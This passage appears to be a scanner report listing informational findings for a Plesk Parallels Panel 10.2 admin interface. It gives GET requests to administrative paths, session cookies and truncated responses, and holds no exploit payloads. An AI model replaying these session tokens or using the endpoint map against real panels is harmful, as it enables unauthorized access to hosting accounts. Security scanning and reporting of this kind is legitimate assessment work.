<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.8. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin-home/featured-applications/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin-home/featured-applications/

Request

GET /admin-home/featured-applications/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 12:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.9. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin-home/installed-applications/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin-home/installed-applications/

Request

GET /admin-home/installed-applications/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:25 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.10. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/

Request

GET /admin/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: psaContext=dashboard; PHPSESSID=af8b59293ecdef34dd27eb4277f6c86f; locale=en-US

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:35:18 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:35:18 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 18:35:18 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.11. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/app/usage

Request

GET /admin/app/usage HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=home; BarExpanded=True

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:55:38 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:55:40 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:40 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.12. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/

Request

GET /admin/customer-service-plan/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:38:42 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:38:47 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:38:47 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.13. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/create

Request

GET /admin/customer-service-plan/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:19:23 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:19:24 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:19:24 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.14. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/edit/id/5

Request

GET /admin/customer-service-plan/edit/id/5 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list?context=service-plans
Cookie: locale=en-US; PHPSESSID=18c3c0c378e73f5dc95c9452acbb30e0; psaContext=service-plans

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:51:02 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:51:03 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:51:03 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.15. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/list

Request

GET /admin/customer-service-plan/list?context=service-plans HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; BarExpanded=True; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:13:51 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:13:51 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:13:51 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.16. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/list/

Request

GET /admin/customer-service-plan/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:38:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:38:25 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:38:25 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.17. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/reset-search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/list/reset-search/

Request

GET /admin/customer-service-plan/list/reset-search/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:38:19 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:38:24 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:38:24 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.18. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/list/reset-search/true/

Request

GET /admin/customer-service-plan/list/reset-search/true/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:19:22 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:19:23 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:19:23 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.19. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/

Request

GET /admin/customer/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:25:42 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:25:43 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:25:43 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.20. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/create

Request

GET /admin/customer/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list?context=customers
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:58:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:58:17 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 18:58:17 GMT
Server: sw-cp-server
Content-Length: 1244


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.21. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list

Request

GET /admin/customer/list?context=customers HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; BarExpanded=True; psaContext=service-plans

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:14:55 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:14:55 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:14:55 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.22. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list/

Request

GET /admin/customer/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:25:40 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:25:41 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:25:41 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.23. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list/reset-search/

Request

GET /admin/customer/list/reset-search/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:25:40 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:25:41 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:25:41 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

